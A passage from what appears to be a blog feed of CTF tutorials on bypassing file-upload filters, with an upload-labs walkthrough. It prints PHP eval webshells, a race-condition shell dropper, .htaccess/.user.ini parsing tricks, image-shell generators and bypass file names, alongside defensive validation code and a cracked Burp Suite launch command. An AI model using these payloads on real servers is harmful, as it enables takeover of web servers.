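    "shell.php::$DATA",      # 2.2.1.1.6 NTFS stream suffix
    "shell.php\x00.jpg",     # 2.2.1.1.7 null-byte truncation
]


def bypass_table():
    """For each trick: (name, passes the weak blacklist, passes the allow-list validator)."""
    return [(n, blacklist_check(n), validate_upload(n, "image/jpeg", PHP_PAYLOAD)[0])
            for n in BYPASS_NAMES]


if __name__ == "__main__":
    for name, weak, strong in bypass_table():
        print(f"{name!r:25} blacklist={weak!s:5} allowlist={strong}")
    # Magic bytes alone do not stop a GIF89a-prefixed PHP file:
    print(validate_upload("x.gif", "image/gif", b"GIF89a" + PHP_PAYLOAD))
```

Every name in the table passes the blacklist and fails the allow-list check, because the allow-list looks at the name as it will be stored. The last line shows the limit of content sniffing: a file that begins with GIF89a and continues with PHP passes every check here, which is exactly the image-trojan case. Validation therefore has to be paired with storing uploads in a location the web server never hands to a script interpreter.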
<h2 id="2-2-1-1-8-上传-access-文件"><a href="#2-2-1-1-8-上传-access-文件" class="headerlink" title="2.2.1.1.8 Uploading a .access file"></a>2.2.1.1.8 Uploading a .access file</h2><p>".access" here is a generic name for per-directory configuration files such as .htaccess and .user.ini that can cause a parsing vulnerability.</p>
<blockquote>
<p><strong>.htaccess</strong><br>The .htaccess file (or "distributed configuration file") stands for Hypertext Access. It provides a way to change configuration per directory: a file containing one or more directives placed in a given document directory applies to that directory and all of its subdirectories. The directives available to users are restricted; the administrator controls them with Apache's AllowOverride directive.</p>
</blockquote>
<p>Create a .htaccess file with the following content and upload it to the server:</p>
<figure class="highlight nginx"><table><tr><td class="code"><pre><span class="line"><span class="attribute">SetHandler</span> application/x-httpd-php</span><br></pre></td></tr></table></figure>
<p>Any file uploaded to that directory afterwards (an image trojan or anything else) that contains PHP code will then have that code executed. This only works where the upload directory is served by Apache with PHP and AllowOverride permits the directive; with it disabled the uploaded .htaccess is ignored.</p>
<blockquote>
<p><strong>.user.ini</strong>:<br>Since PHP 5.3.0, PHP supports .htaccess-style INI files on a per-directory basis. These files are processed only by the CGI/FastCGI SAPI. This feature obsoletes the PECL htscanner extension. If you are running Apache, use .htaccess files for the same effect.</p>
<p>In addition to the main php.ini, PHP scans for INI files in each directory, starting with the directory of the requested PHP file and working upward to the current document root (as set in $_SERVER['DOCUMENT_ROOT']). If the PHP file is outside the document root, only its own directory is scanned.</p>
<p>Only INI settings with the modes PHP_INI_PERDIR and PHP_INI_USER are recognised in .user.ini-style INI files.</p>
<p>Two new INI directives, user_ini.filename and user_ini.cache_ttl, control the use of user INI files.</p>
<p>user_ini.filename sets the name of the file PHP looks for in each directory; if set to an empty string, PHP does not scan at all. The default is .user.ini.</p>
<p>user_ini.cache_ttl controls how often user INI files are re-read. The default is 300 seconds (5 minutes).</p>
</blockquote>
<p>Triggering the .user.ini parsing vulnerability, however, requires three preconditions:</p>
<ul>
<li>The server-side scripting language is PHP</li>
<li>The server runs PHP in CGI/FastCGI mode</li>
<li>There is an executable PHP file in the upload directory</li>
</ul>
<p>First create a .user.ini file with the following content:</p>
<figure class="highlight ini"><table><tr><td class="code"><pre><span class="line"><span class="attr">auto_prepend_file</span>=x.png</span><br></pre></td></tr></table></figure>
<p>After uploading .user.ini, upload an x.png file; any valid PHP code inside x.png will then be executed.</p>
<h2 id="2-2-1-1-9-条件竞争绕过"><a href="#2-2-1-1-9-条件竞争绕过" class="headerlink" title="2.2.1.1.9 Race condition bypass"></a>2.2.1.1.9 Race condition bypass</h2><p>How the race condition works:<br>Site logic:</p>
<ol>
<li>The site allows any file to be uploaded, then checks whether the uploaded file contains a webshell and deletes it if so.</li>
<li>The site allows any file to be uploaded, but if it is not of the specified type, deletes it with unlink.</li>
</ol>
<p>Requesting the uploaded PHP file before it is deleted executes the PHP code it contains.<br>For example, the uploaded file contains the following code:</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line"><?php fputs(fopen('shell.php','w'),'<?php @eval($_POST["cmd"])?>');?></span><br></pre></td></tr></table></figure>
<p>The file is stored first and checked and deleted afterwards; the webshell upload exploits that time window.</p>
<h2 id="2-2-1-1-10-上传图片马配合文件解析漏洞绕过"><a href="#2-2-1-1-10-上传图片马配合文件解析漏洞绕过" class="headerlink" title="2.2.1.1.10 Uploading an image shell combined with a file parsing vulnerability"></a>2.2.1.1.10 Uploading an image shell combined with a file parsing vulnerability</h2><p>Two ways of making and using an image shell are introduced here.</p>
<h4 id="第一种:"><a href="#第一种:" class="headerlink" title="Method 1:"></a>Method 1:</h4><p>The simple way: put the GIF89a image signature at the start of the file (equivalently, set the hex bytes 47 49 46 38 39 61):</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">GIF89a</span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="title function_ invoke__">phpinfo</span>();</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>Save the file as x.gif; after uploading it to the server, a file inclusion vulnerability is needed to execute the code.<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%A9%E7%94%A8%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/1582775243-466351-upload-labs15-2.png" alt="img"><br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%A9%E7%94%A8%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/1582775285-902970-upload-labs15-3.png" alt="img"></p>
<blockquote>
<p><strong>File inclusion:</strong><br>When the server executes a PHP file, a file inclusion function can load the PHP code of another file and execute it as PHP, which saves developers a lot of time. It means you can create a standard header or menu file that all pages reference. When the header needs updating, you update a single include file, and when you add a new page to the site you only need to edit the menu file (rather than updating the links on every page).<br>PHP has the following four file inclusion functions:</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="keyword">require</span>()</span><br><span class="line"><span class="keyword">require_once</span>()</span><br><span class="line"><span class="keyword">include</span>()</span><br><span class="line"><span class="keyword">include_once</span>()</span><br></pre></td></tr></table></figure>
<p>The main difference between include and require is that if an error occurs during inclusion, include raises a warning and the program continues, whereas require raises a fatal error and execution stops.</p>
<p>include_once() and require_once() differ from the first two in that they include a file only once; they are for cases where the same file might be included more than once during script execution and you want to ensure it is included only once, avoiding problems such as function redefinition and variable reassignment.</p>
<p><strong>Root cause:</strong><br>The parameter passed to the file inclusion function is neither filtered nor strictly defined, so a user can control it, include another malicious file, and cause unintended code to execute.</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"> <span class="variable">$filename</span> = <span class="variable">$_GET</span>[<span class="string">'filename'</span>];</span><br><span class="line"> <span class="keyword">include</span>(<span class="variable">$filename</span>);</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
</blockquote>
<h4 id="第二种:"><a href="#第二种:" class="headerlink" title="Method 2:"></a>Method 2:</h4><p>Some PHP environments call a library such as GD to verify that the upload really is an image; even a crafted image file is rejected if its data does not conform to the image format. So let us look at how to construct an image file whose data does conform.</p>
<p>The following code produces an image file that passes the image check:</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">//png.php</span></span><br><span class="line"><span class="variable">$p</span> = <span class="keyword">array</span>(<span class="number">0xa3</span>, <span class="number">0x9f</span>, <span class="number">0x67</span>, <span class="number">0xf7</span>, <span class="number">0xe</span>, <span class="number">0x93</span>, <span class="number">0x1b</span>, <span class="number">0x23</span>, <span class="number">0xbe</span>, <span class="number">0x2c</span>, <span class="number">0x8a</span>, <span class="number">0xd0</span>, <span class="number">0x80</span>, <span class="number">0xf9</span>, <span class="number">0xe1</span>, <span class="number">0xae</span>, <span class="number">0x22</span>, <span class="number">0xf6</span>, <span class="number">0xd9</span>, <span class="number">0x43</span>, <span class="number">0x5d</span>, <span class="number">0xfb</span>, <span class="number">0xae</span>, <span class="number">0xcc</span>, <span class="number">0x5a</span>, <span class="number">0x1</span>, <span class="number">0xdc</span>, <span class="number">0x5a</span>, <span class="number">0x1</span>, <span class="number">0xdc</span>, <span class="number">0xa3</span>, <span class="number">0x9f</span>, <span class="number">0x67</span>, <span class="number">0xa5</span>, <span class="number">0xbe</span>, <span class="number">0x5f</span>, <span class="number">0x76</span>, <span class="number">0x74</span>, <span class="number">0x5a</span>, <span class="number">0x4c</span>, <span class="number">0xa1</span>, <span class="number">0x3f</span>, <span class="number">0x7a</span>, <span class="number">0xbf</span>, <span class="number">0x30</span>, <span class="number">0x6b</span>, <span class="number">0x88</span>, <span class="number">0x2d</span>, <span class="number">0x60</span>, <span class="number">0x65</span>, <span 
class="number">0x7d</span>, <span class="number">0x52</span>, <span class="number">0x9d</span>, <span class="number">0xad</span>, <span class="number">0x88</span>, <span class="number">0xa1</span>, <span class="number">0x66</span>, <span class="number">0x44</span>, <span class="number">0x50</span>, <span class="number">0x33</span>);</span><br><span class="line"><span class="variable">$img</span> = <span class="title function_ invoke__">imagecreatetruecolor</span>(<span class="number">32</span>, <span class="number">32</span>);</span><br><span class="line"><span class="keyword">for</span> (<span class="variable">$y</span> = <span class="number">0</span>; <span class="variable">$y</span> < <span class="title function_ invoke__">sizeof</span>(<span class="variable">$p</span>); <span class="variable">$y</span> += <span class="number">3</span>) {</span><br><span class="line"> <span class="variable">$r</span> = <span class="variable">$p</span>[<span class="variable">$y</span>];</span><br><span class="line"> <span class="variable">$g</span> = <span class="variable">$p</span>[<span class="variable">$y</span>+<span class="number">1</span>];</span><br><span class="line"> <span class="variable">$b</span> = <span class="variable">$p</span>[<span class="variable">$y</span>+<span class="number">2</span>];</span><br><span class="line"> <span class="variable">$color</span> = <span class="title function_ invoke__">imagecolorallocate</span>(<span class="variable">$img</span>, <span class="variable">$r</span>, <span class="variable">$g</span>, <span class="variable">$b</span>);</span><br><span class="line"> <span class="title function_ invoke__">imagesetpixel</span>(<span class="variable">$img</span>, <span class="title function_ invoke__">round</span>(<span class="variable">$y</span> / <span class="number">3</span>), <span class="number">0</span>, <span class="variable">$color</span>);</span><br><span class="line">}</span><br><span class="line"><span class="title function_ 
invoke__">imagepng</span>(<span class="variable">$img</span>,<span class="string">'./pass17.png'</span>);</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>Usage:</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">zhzy@debian:~$ php payload.php file.png</span><br></pre></td></tr></table></figure>
<p>file.png is an ordinary PNG image.<br>The result is pass17.png.<br>The generated file likewise needs a file inclusion vulnerability to be exploited.</p>
<h2 id="2-2-1-2-针对-linux-系统绕过"><a href="#2-2-1-2-针对-linux-系统绕过" class="headerlink" title="2.2.1.2 Bypasses on Linux"></a>2.2.1.2 Bypasses on Linux</h2><p>Linux handles files differently from Windows, so some bypasses that work on Windows do not apply on Linux. Let us look at which bypasses are usable against an upload point on a Linux system.</p>
<h2 id="2-2-1-2-1-使用其他可执行并且未限制的后缀名"><a href="#2-2-1-2-1-使用其他可执行并且未限制的后缀名" class="headerlink" title="2.2.1.2.1 Using other executable extensions that are not restricted"></a>2.2.1.2.1 Using other executable extensions that are not restricted</h2><p>The idea is simply "upload whatever extension is not restricted": use the earlier Burp Suite extension-testing approach to find out which extensions can be uploaded, then craft a matching shell. (See also 2.2 on how to find out which extensions are allowed.)</p>
<h2 id="2-2-1-2-2-文件名双写绕过"><a href="#2-2-1-2-2-文件名双写绕过" class="headerlink" title="2.2.1.2.2 Doubled file name bypass"></a>2.2.1.2.2 Doubled file name bypass</h2><p>Doubling the extension still works on Linux, but mixed-case variants do not.<br>Consider restriction code such as this:</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$file_name</span> = <span class="title function_ invoke__">str_ireplace</span>(<span class="variable">$deny_ext</span>,<span class="string">""</span>, <span class="variable">$file_name</span>);</span><br></pre></td></tr></table></figure>
<p>Simply doubling the extension, x.pphphp, bypasses it; the resulting file is x.php.</p>
<h2 id="2-2-1-2-3-00截断上传绕过"><a href="#2-2-1-2-3-00截断上传绕过" class="headerlink" title="2.2.1.2.3 Null-byte (00) truncation upload bypass"></a>2.2.1.2.3 Null-byte (00) truncation upload bypass</h2><blockquote>
<p><strong>Null-byte (00) truncation</strong><br>Whether written as 0x00 or %00, after decoding both end up as the same thing: chr(0).<br>chr() is a function that returns the character corresponding to its argument: the argument is an ASCII code and the return value is a one-character string.</p>
<p>chr(0) is then easy to understand: in the ASCII table the codes 0-127 each map to one character, and 0 maps to the NUL character (NULL), the null byte. This null byte is the key to truncation: when a string contains one, the parser discards everything after it.<br>This behaviour is common in ASP programs, also occurs in PHP versions below 5.3.4, and can appear in JSP as well.<br>So the principle of 00 truncation is clear: inserting a null byte (not a space) into the suffix causes the part after it to be dropped, which produces the bypass. For example, inserting a null byte into the file name 1.php.jpg to give 1.php.0x00.jpg leaves only 1.php after parsing. How is the null byte inserted? Usually, after capturing the request with Burp, we insert a space into the file name, find the hex encoding of that space ("20") in the HEX view, and change it to 00 (hexadecimal ASCII 00, decimal 0); that inserts the null byte. PS: the space is purely a marker to make the position easy to find; any character would do, but a space is distinctive and easy to locate in the HEX view.</p>
</blockquote>
<p>In a PHP environment, 00 truncation requires both of the following conditions; neither can be missing.</p>
<ul>
<li>PHP version below 5.3.4</li>
<li>PHP's magic_quotes_gpc is OFF</li>
</ul>
<h2 id="2-2-1-2-4-上传-access-文件"><a href="#2-2-1-2-4-上传-access-文件" class="headerlink" title="2.2.1.2.4 Uploading .access files"></a>2.2.1.2.4 Uploading .access files</h2><p>See also: 2.2.1.1.8<br>The same bypass, combined with a parsing vulnerability, still applies on Linux, because this class of vulnerability is caused by PHP or the middleware, not by the operating system.</p>
<h2 id="2-2-1-2-5-条件竞争绕过"><a href="#2-2-1-2-5-条件竞争绕过" class="headerlink" title="2.2.1.2.5 Race condition bypass"></a>2.2.1.2.5 Race condition bypass</h2><p>Likewise, the operating system has no control over a race condition in file upload; the vulnerability stems from the PHP code logic.<br>How the race condition works:<br>Site logic:</p>
<ol>
<li>The site allows any file to be uploaded, then checks whether the uploaded file contains a webshell and deletes it if so.</li>
<li>The site allows any file to be uploaded, but if it is not of the specified type, deletes it with unlink.</li>
</ol>
<p>Requesting the uploaded PHP file before it is deleted executes the PHP code it contains.<br>For example, the uploaded file contains the following code:</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span> <span class="title function_ invoke__">fputs</span>(<span class="title function_ invoke__">fopen</span>(<span class="string">'shell.php'</span>,<span class="string">'w'</span>),<span class="string">'<?php @eval($_POST["cmd"])?>'</span>);<span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>The file is stored first and checked and deleted afterwards; the webshell upload exploits that time window.</p>
<h2 id="2-2-1-2-6-上传图片马配合文件解析漏洞绕过"><a href="#2-2-1-2-6-上传图片马配合文件解析漏洞绕过" class="headerlink" title="2.2.1.2.6 Uploading an image shell combined with a file parsing vulnerability"></a>2.2.1.2.6 Uploading an image shell combined with a file parsing vulnerability</h2><p>See also: 2.2.1.1.10</p>
<h2 id="2-2-2-白名单验证绕过"><a href="#2-2-2-白名单验证绕过" class="headerlink" title="2.2.2 Whitelist validation bypass"></a>2.2.2 Whitelist validation bypass</h2><blockquote>
<p><strong>Blacklist & whitelist</strong><br>Blacklist and whitelist here refer to how the upload point restricts files. A blacklist, for example, rejects only the xxx format: anything that is not xxx can be uploaded to the server. The corresponding whitelist allows only the yyy format: any file that is not yyy is rejected.</p>
</blockquote>
<p>Clearly a whitelist is stricter than a blacklist: with a blacklist, anything the list fails to cover can still be uploaded, whereas a whitelist allows only xxx files and rejects everything else.</p>
<p>So compared with a blacklist, a whitelist offers far fewer bypasses.</p>
<h2 id="2-2-2-1-上传图片马配合文件解析漏洞绕过"><a href="#2-2-2-1-上传图片马配合文件解析漏洞绕过" class="headerlink" title="2.2.2.1 Uploading an image shell combined with a file parsing vulnerability"></a>2.2.2.1 Uploading an image shell combined with a file parsing vulnerability</h2><p>Because the extension is strictly locked down, we can only upload image files that satisfy the rule, so the bypass is an image shell combined with a file inclusion or file parsing vulnerability.</p>
<p>For how to generate such an image file, see 2.2.1.1.10.</p>
<h2 id="2-2-2-2-上传-access-文件绕过"><a href="#2-2-2-2-上传-access-文件绕过" class="headerlink" title="2.2.2.2 Uploading .access files to bypass"></a>2.2.2.2 Uploading .access files to bypass</h2><p>Here .access is only a generic placeholder; concretely it covers files such as .htaccess and .user.ini that can cause parsing vulnerabilities.<br>For the exploitation details, see 2.2.1.1.8.</p>
<h2 id="2-3-基于文件内容验证"><a href="#2-3-基于文件内容验证" class="headerlink" title="2.3 Content-based validation"></a>2.3 Content-based validation</h2><p>This restriction uses neither a blacklist nor a whitelist; it inspects the content of the uploaded file, passing it if the data matches an image signature and deleting or rejecting it otherwise. To bypass it we need an image shell whose data matches the image signature.</p>
<h2 id="2-3-1-上传图片马配合文件解析漏洞绕过"><a href="#2-3-1-上传图片马配合文件解析漏洞绕过" class="headerlink" title="2.3.1 Uploading an image shell combined with a file parsing vulnerability"></a>2.3.1 Uploading an image shell combined with a file parsing vulnerability</h2><p>For how to make an image shell that matches the image signature, see 2.2.1.1.10.</p>
]]></content>
<categories>
<category>CTF</category>
</categories>
<tags>
<tag>ctf</tag>
<tag>web</tag>
</tags>
</entry>
<entry>
<title>File Upload Lab Practice</title>
<url>/2020/08/04/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/</url>
<content><![CDATA[<p>Target: <a href="https://github.com/c0ny1">c0ny1</a>/<strong><a href="https://github.com/c0ny1/upload-labs">upload-labs</a></strong></p>
<h2 id="burpsuite"><a href="#burpsuite" class="headerlink" title="burpsuite"></a>burpsuite</h2><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">java -Dfile.encoding=utf-8 -javaagent:BurpSuiteCn.jar -Xbootclasspath/p:burp-loader-keygen.jar -jar burpsuite_pro_v1.7.34.jar</span><br></pre></td></tr></table></figure>
<h2 id="靶机下载"><a href="#靶机下载" class="headerlink" title="Downloading the target"></a>Downloading the target</h2><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">docker login --username=t_1485709121283_0181 registry.cn-shenzhen.aliyuncs.com</span><br><span class="line">docker pull registry.cn-shenzhen.aliyuncs.com/glan/upload-labs:latest</span><br><span class="line">docker run -d -p 80:80 upload-labs:latest</span><br></pre></td></tr></table></figure>
<h2 id="文件上传漏洞概述"><a href="#文件上传漏洞概述" class="headerlink" title="Overview of file upload vulnerabilities"></a>Overview of file upload vulnerabilities</h2><p>File upload, as the name says, is the feature of uploading files. It turns into a severe vulnerability when the program does not validate, or only loosely filters, the data a visitor submits, so that modified data can be submitted directly to bypass the extension check. File upload vulnerabilities are among the simplest and most rampant forms of exploitation: generally, once a file can be uploaded, its address obtained, and the executable file parsed, a WebShell on the system follows.</p>
<blockquote>
<p><strong>Webshell</strong><br>A webshell is a command execution environment that exists in the form of a web file such as asp, php, jsp or cgi; it can also be called a web backdoor. After compromising a site, an attacker typically places an asp or php backdoor file among the normal web files in the server's web directory, then accesses the backdoor through a browser to obtain a command execution environment and thereby control the web server.<br>As the name suggests, "web" means the server must expose a web service, and "shell" means gaining some degree of operating privilege on the server. A webshell is often described as the degree of control an intruder gains over the web server through the website's port. Because webshells mostly appear as dynamic scripts, some also call them website backdoor tools.</p>
</blockquote>
<p>Web applications commonly have file upload features, such as document, image, avatar and video uploads. When the code implementing the upload does not strictly check the extension and type of the uploaded file, arbitrary files, even executable backdoors, can be uploaded.</p>
<p>File upload vulnerabilities have many causes, so there are many ways to exploit them; the figure below shows some common bypass techniques and ideas:</p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582510679-150193-upload1.png" alt="1582510679-150193-upload1"></p>
<h2 id="Pass-1-js检查"><a href="#Pass-1-js检查" class="headerlink" title="Pass-1-JS check"></a>Pass-1-JS check</h2><figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">checkFile</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> file = document.<span class="title function_ invoke__">getElementsByName</span>(<span class="string">'upload_file'</span>)[<span class="number">0</span>].value;</span><br><span class="line"> <span class="keyword">if</span> (file == <span class="literal">null</span> || file == <span class="string">""</span>) {</span><br><span class="line"> <span class="title function_ invoke__">alert</span>(<span class="string">"请选择要上传的文件!"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">//define the file types allowed for upload</span></span><br><span class="line"> <span class="keyword">var</span> allow_ext = <span class="string">".jpg|.png|.gif"</span>;</span><br><span class="line"> <span class="comment">//extract the uploaded file's extension</span></span><br><span class="line"> <span class="keyword">var</span> ext_name = file.<span class="title function_ invoke__">substring</span>(file.<span class="title function_ invoke__">lastIndexOf</span>(<span class="string">"."</span>));</span><br><span class="line"> <span class="comment">//check whether the uploaded file type is allowed</span></span><br><span class="line"> <span class="keyword">if</span> (allow_ext.<span class="title function_ invoke__">indexOf</span>(ext_name + <span class="string">"|"</span>) == -<span class="number">1</span>) {</span><br><span class="line"> <span class="keyword">var</span> errMsg = <span class="string">"该文件不允许上传,请上传"</span> + allow_ext + <span class="string">"类型的文件,当前文件类型为:"</span> + ext_name;</span><br><span class="line"> <span class="title function_ invoke__">alert</span>(errMsg);</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>Uploading a PHP file directly gives the following prompt:</p>
<p><img src="https://freeerror.org/assets/files/2020-02-24/1582511360-668212-upload1-5.png" alt="img"></p>
<p>Looking at the source: the extension of the uploaded file is restricted, but the restriction is implemented in JavaScript on the client side, which means that once the front-end JS type check is bypassed, any file can be uploaded.</p>
<p>So first craft a one-line shell as 1.php:</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span> @<span class="keyword">eval</span>(<span class="variable">$_POST</span>[<span class="number">123123</span>])<span class="meta">?></span> </span><br></pre></td></tr></table></figure>
<p>Then, to satisfy the JS rule, rename 1.php to 1.jpg, choose it, and click upload:</p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582511932-510797-upload1-0.png" alt="img"></p>
<p>Because the check is front-end JS, you can simply disable JS,<br>or intercept the request with Burp and change the file name (upload 1.jpg and rename it to 1.php).</p>
<p>The request captured in Burp Suite on the right shows that 1.jpg matched the JS rule and has already passed the JS check; now rename 1.jpg to 1.php directly in Burp Suite and click "Forward", and the one-line webshell is uploaded to the server.</p>
<p>Next, connect to the webshell with AntSword:</p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582512119-157722-upload1-2.png" alt="img"></p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582512180-992152-upload1-3.png" alt="img"> </p>
<h2 id="Pass-2-只验证Content-type"><a href="#Pass-2-只验证Content-type" class="headerlink" title="Pass-2-Content-Type check only"></a>Pass-2-Content-Type check only</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(UPLOAD_PATH)) {</span><br><span class="line"> <span class="keyword">if</span> ((<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'type'</span>] == <span class="string">'image/jpeg'</span>) || (<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'type'</span>] == <span class="string">'image/png'</span>) || (<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'type'</span>] == <span class="string">'image/gif'</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH . <span class="string">'/'</span> . <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>];</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'文件类型不正确,请重新上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH.<span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>From the prompt one can tell that Pass 02 does not use the file-extension whitelist of Pass 01 but a MIME type restriction; the source confirms this.</p>
<p><code>$_FILES['upload_file']['type']</code> reads the MIME type of the uploaded file; only image/jpeg, image/png and image/gif are allowed.<br>That gives us two bypasses:</p>
<ul>
<li>Change the Content-Type field of the request to declare the file as an image, then upload the PHP file</li>
<li>Change the file extension to jpg, png or gif, upload, and rename it back to php (the same approach as Pass 01)</li>
</ul>
<p>We use the second approach:<br>Upload 2.jpg and intercept it with Burp Suite<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582513869-537193-upload2-5.png" alt="img"><br>Rename 2.jpg to 2.php and click Forward; the upload succeeds:<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582513941-521761-upload2-6.png" alt="img"></p>
<p>Connect to the webshell with AntSword:<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582514013-241795-upload2-7.png" alt="img"></p>
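<p>What the server actually receives in Pass-02, as an added example that is not part of the original write-up or of upload-labs: the multipart request is parsed the way the back end sees it, showing that the part's Content-Type (which fills <code>$_FILES['upload_file']['type']</code>) is a header the client wrote, and that a declared type disagreeing with the file name is a signal worth logging. RAW_REQUEST is a constructed request in the shape Burp displays; the host name and field values are assumptions.</p>

```python
import email
import re
from email import policy

# Constructed request as Burp would show it for Pass-02: the part's
# Content-Type claims image/jpeg while the file name and body are PHP.
RAW_REQUEST = (
    b"POST /Pass-02/index.php HTTP/1.1\r\n"
    b"Host: upload-labs.example\r\n"
    b'Content-Type: multipart/form-data; boundary="----WebKitFormBoundaryX"\r\n'
    b"\r\n"
    b"------WebKitFormBoundaryX\r\n"
    b'Content-Disposition: form-data; name="upload_file"; filename="2.php"\r\n'
    b"Content-Type: image/jpeg\r\n"
    b"\r\n"
    b"<?php phpinfo(); ?>\r\n"
    b"------WebKitFormBoundaryX\r\n"
    b'Content-Disposition: form-data; name="submit"\r\n'
    b"\r\n"
    b"upload\r\n"
    b"------WebKitFormBoundaryX--\r\n"
)

ALLOWED_MIME = {"image/jpeg", "image/png", "image/gif"}  # Pass-02's own rule
EXT_TO_MIME = {"jpg": "image/jpeg", "jpeg": "image/jpeg",
               "png": "image/png", "gif": "image/gif"}
PHP_OPEN = re.compile(rb"<\?php|<\?=", re.I)


def file_parts(raw_request: bytes) -> list[dict]:
    """Parse the multipart body and describe every part that carries a file."""
    # Drop the request line; what remains is headers plus body in MIME form,
    # which the standard email parser handles.
    mime = email.message_from_bytes(raw_request.split(b"\r\n", 1)[1],
                                    policy=policy.default)
    found = []
    for part in mime.iter_parts():
        filename = part.get_filename()
        if filename is None:
            continue  # an ordinary form field such as "submit"
        body = part.get_payload(decode=True) or b""
        ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
        found.append({
            "field": part.get_param("name", header="content-disposition"),
            "filename": filename,
            "declared_mime": part.get_content_type(),  # client-written header
            "ext": ext,
            "body_has_php": PHP_OPEN.search(body) is not None,
        })
    return found


def pass02_accepts(part: dict) -> bool:
    """The lab's rule: trust the client-supplied part Content-Type."""
    return part["declared_mime"] in ALLOWED_MIME


def hardened_accepts(part: dict) -> tuple[bool, str]:
    """Extension allowlist, declared type must agree with the extension, and
    the body must not open PHP. Name and declared type are both chosen by the
    client, so disagreement between them is itself a detection signal."""
    expected = EXT_TO_MIME.get(part["ext"])
    if expected is None:
        return False, f"extension .{part['ext']} not allowed"
    if part["declared_mime"] != expected:
        return False, f"declared {part['declared_mime']} but extension implies {expected}"
    if part["body_has_php"]:
        return False, "PHP open tag in body"
    return True, "ok"


def audit(raw_request: bytes) -> list[str]:
    """One log line per file part; a pass02=accept/hardened=reject pair is
    the spoofed Content-Type case worth alerting on."""
    lines = []
    for p in file_parts(raw_request):
        ok, why = hardened_accepts(p)
        lines.append(f"field={p['field']} file={p['filename']} "
                     f"declared={p['declared_mime']} "
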